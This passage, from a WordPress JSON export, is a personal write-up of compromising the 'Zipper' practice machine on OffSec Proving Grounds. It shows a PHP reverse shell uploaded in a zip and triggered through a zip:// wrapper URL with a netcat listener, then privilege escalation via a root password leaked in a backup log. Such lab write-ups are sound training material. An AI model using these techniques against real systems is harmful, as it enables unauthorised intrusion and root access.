alt=\"\" class=\"wp-image-370\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-78.png 707w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-78-300x63.png 300w\" sizes=\"auto, (max-width: 707px) 100vw, 707px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"207\" height=\"114\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-79.png\" alt=\"\" class=\"wp-image-371\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"789\" height=\"171\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80.png\" alt=\"\" class=\"wp-image-372\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80.png 789w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80-300x65.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80-768x166.png 768w\" sizes=\"auto, (max-width: 789px) 100vw, 789px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"147\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81.png\" alt=\"\" class=\"wp-image-373\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81.png 770w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81-300x57.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81-768x147.png 768w\" sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"539\" height=\"69\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-82.png\" alt=\"\" class=\"wp-image-374\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-82.png 539w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-82-300x38.png 300w\" sizes=\"auto, (max-width: 539px) 100vw, 539px\" \/><\/figure>\n\n\n\n<p>So, load the file\/s in. Zip them. Click the download to retrieve the zipped file. Note: the download function allows us to conveniently see the file name (we&#8217;ll need that later).<\/p>\n\n\n\n<p>Now, craft the PHP reverse shell. I like to use <a href=\"https:\/\/www.revshells.com\/\" target=\"_blank\" rel=\"noopener\" title=\"\">RevShells.com<\/a>. The &#8220;PHP PentestMonkey&#8221; variant should work well. Copy the output and paste it into a file. I called my file <code>revshell.php<\/code> (this will be needed later). Feed it into Zipper like above, being sure to download in order to get the zipped file name.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"69\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-83.png\" alt=\"\" class=\"wp-image-375\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-83.png 531w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-83-300x39.png 300w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/figure>\n\n\n\n<p>Start your netcat listener on the port specified when creating you <code>php reverse shell<\/code>.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"598\" height=\"133\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-84.png\" alt=\"\" class=\"wp-image-376\" style=\"width:598px;height:auto\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-84.png 598w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-84-300x67.png 300w\" sizes=\"auto, (max-width: 598px) 100vw, 598px\" \/><\/figure>\n\n\n\n<p>Now it&#8217;s time to place the <code>zip php wrapper<\/code> into the address bar on the browser. Below is the wrapper with some explanation underneath.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"http:\/\/zipper.offsec\/index.php?file=zip:\/\/uploads\/upload_1718928576.zip%23revshell\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">http:\/\/zipper.offsec\/index.php?file=zip:\/\/uploads\/upload_1718928576.zip%23revshell<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>file=zip<\/code> &#8211;&gt; activates the zip wrapper<\/li>\n\n\n\n<li><code>\/\/uploads\/upload_1718928576.zip<\/code> &#8211;&gt; the uploaded directory and the zip filename containing the malicious payload<\/li>\n\n\n\n<li><code>%23revshell<\/code> &#8211;&gt; URL encode # (%23) followed by the name we had for our file. Since many files can be in a zipped archive (ie test-alpha.txt, test-bravo.txt, etc) this instructs which specific file to access.<\/li>\n<\/ul>\n\n\n\n<p>Execute and check the listener for success.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"787\" height=\"374\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85.png\" alt=\"\" class=\"wp-image-377\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85.png 787w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85-300x143.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85-768x365.png 768w\" sizes=\"auto, (max-width: 787px) 100vw, 787px\" \/><\/figure>\n\n\n\n<p>The <code>local.txt<\/code> flag is located in <code>\/var\/www<\/code>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Privilege Escalation<\/h3>\n\n\n\n<p>While enumerating with various commands, something interesting was found while checking cron jobs. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/etc\/crontab<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"346\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86.png\" alt=\"\" class=\"wp-image-379\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86.png 800w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86-300x130.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86-768x332.png 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<p>The file <code>\/opt\/backup.sh<\/code> looks interesting due to the 5 * (asterisks\/splats) indicating this file is run automatically every minute. Changing directories (cd) into <code>\/opt\/<\/code> and listing all (ls -la) the contents of the directory shows the permissions of <code>backup.sh<\/code>. The contents of <code>backup.sh<\/code> is then printed to screen (cat).<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"672\" height=\"351\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-88.png\" alt=\"\" class=\"wp-image-381\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-88.png 672w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-88-300x157.png 300w\" sizes=\"auto, (max-width: 672px) 100vw, 672px\" \/><\/figure>\n\n\n\n<p>Unfortunately, only the file&#8217;s owner (<code>root<\/code>) has permission to alter the file. So, we are unable to manipulate it in a malicious manner. Let&#8217;s examine the contents of <code>backup.sh<\/code> to determine what it is doing.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"#!\/bin\/bash\npassword=`cat \/root\/secret`\ncd \/var\/www\/html\/uploads\nrm *.tmp\n7za a \/opt\/backups\/backup.zip -p$password -tzip *.zip &gt; \/opt\/backups\/backup.log\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #545454; font-style: italic\">#!\/bin\/bash<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">password<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #89DDFF\">`<\/span><span style=\"color: #FFCB6B\">cat<\/span><span style=\"color: #C3E88D\"> \/root\/secret<\/span><span style=\"color: #89DDFF\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">cd<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">\/var\/www\/html\/uploads<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rm<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #EEFFFF\">*<\/span><span style=\"color: #C3E88D\">.tmp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">7za<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">\/opt\/backups\/backup.zip<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #EEFFFF\">$password<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-tzip<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #EEFFFF\">*<\/span><span style=\"color: #C3E88D\">.zip<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">\/opt\/backups\/backup.log<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>password=cat \/root\/secret<\/code> &#8211;&gt; a variable of &#8220;password&#8221; is declared and it&#8217;s contents in <code>\/root\/secret<\/code><\/li>\n\n\n\n<li><code>cd \/var\/www\/html\/uploads<\/code> &#8211;&gt; change directories into the &#8220;uploads&#8221; directory for the Zipper website.<\/li>\n\n\n\n<li><code>rm *.tmp<\/code> &#8211;&gt; remove any file with a <code>.tmp<\/code> extension<\/li>\n\n\n\n<li><code>7za a \/opt\/backups\/backup.zip -p$password -tzip *.zip &gt; \/opt\/backups\/backup.logwww-data<\/code> &#8211;&gt; Use 7-zip (7za) to archive all (a) files to the <code>\/opt\/backups\/backup.zip<\/code>. It uses the <code>password<\/code> that was declared (\/root\/secret) and writes the file to <code>\/opt\/backups\/backup.log<\/code><\/li>\n<\/ul>\n\n\n\n<p>So, that password would be good to acquire. Let&#8217;s check out the <code>backup.log<\/code> file to see if we can view anything useful.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro cbp-blur-enabled\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;--cbp-line-number-width:calc(2 * 0.6 * .875rem);--cbp-line-highlight-color:rgba(238, 255, 255, 0.2);line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7371 16-Core Processor                 (800F12),ASM,AES-NI)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Open archive: \/opt\/backups\/backup.zip<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">--<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Path = \/opt\/backups\/backup.zip<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Type = zip<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Physical Size = 1779<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Scanning the drive:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">3 files, 1327 bytes (2 KiB)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Updating archive: \/opt\/backups\/backup.zip<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Items to compress: 3<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Files read from disk: 3<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Archive size: 1779 bytes (2 KiB)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Scan WARNINGS for files and folders:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line cbp-line-highlight cbp-no-blur\"><span style=\"color: #EEFFFF\">WildCardsGoingWild : No more files<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">----------------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Scan WARNINGS: 1<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>What looks like password is discovered in the file. <code>WildCardsGoingWild<\/code>. The only potential login point we discovered was the <code>OpenSSH<\/code> service we found in the NMAP scan. No other usernames were discovered, so let&#8217;s try to login as <code>root<\/code>.<\/p>\n\n\n\n<p>Success!<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"392\" height=\"178\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-89.png\" alt=\"\" class=\"wp-image-382\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-89.png 392w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-89-300x136.png 300w\" sizes=\"auto, (max-width: 392px) 100vw, 392px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">The Debriefing<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">What went right?<\/h3>\n\n\n\n<p>Although this machine was rated &#8220;Hard&#8221; I didn&#8217;t find it to be terribly difficult. Maybe I got lucky and it interested me in a particular way and my researching panned out. I rarely felt like I was in the &#8220;Rabbit Hole of Despair&#8221; that I can sometimes fall into with attacking these machines.<\/p>\n\n\n\n<p>Report writing is getting faster and I feel more efficient. I am getting more used to the tools and workflow of creating this content. Also, getting an eye for what looks well for presentation purposes.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">What went wrong?<\/h3>\n\n\n\n<p>Escalating privilege did take me quite a while. When I finally figured it out, I was a bit mad at myself for not seeing it earlier. I need to get more familiar with priv esc and develop more customized techniques for getting there faster with less wasted time\/energy.<\/p>\n\n\n\n<p>I am also experiencing some self doubt on how much to include in the reporting. I want to thoroughly explain and understand what I am doing with the attacks, yet do not want to be excessively verbose. I am my audience, yet I am aware that others will be consuming this.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Lessons Learned<\/h3>\n\n\n\n<p>The skill level with creating the write-ups should increase with experience. I am constantly reminding myself: Progress, not Perfection. <\/p>\n\n\n\n<p>My notes were better on this one. Reminding me even more to continue with good note taking in the moment. While attacking a box, I&#8217;m thinking it might be a good tactic to go back and re-exploit everything a second time with the intent of creating more solid notes. I have done that before and feel I should make it common practice.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Summary Platform Site OffSec Proving Grounds (Practice) Hostname zipper Domain zipper.offsec Operating System \/ Architecture Linux Rating Hard This write-up is for the machine Zipper on the OffSec Proving Grounds (Practice) labs. I will show about PHP wrappers and take the machine al the way through Privilege Escalation. The Attack Scanning &amp; Prelims NMAP [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-356","post","type-post","status-publish","format-standard","hentry","category-vuln-machines"],"_links":{"self":[{"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts\/356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=356"}],"version-history":[{"count":9,"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts\/356\/revisions"}],"predecessor-version":[{"id":417,"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts\/356\/revisions\/417"}],"wp:attachment":[{"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}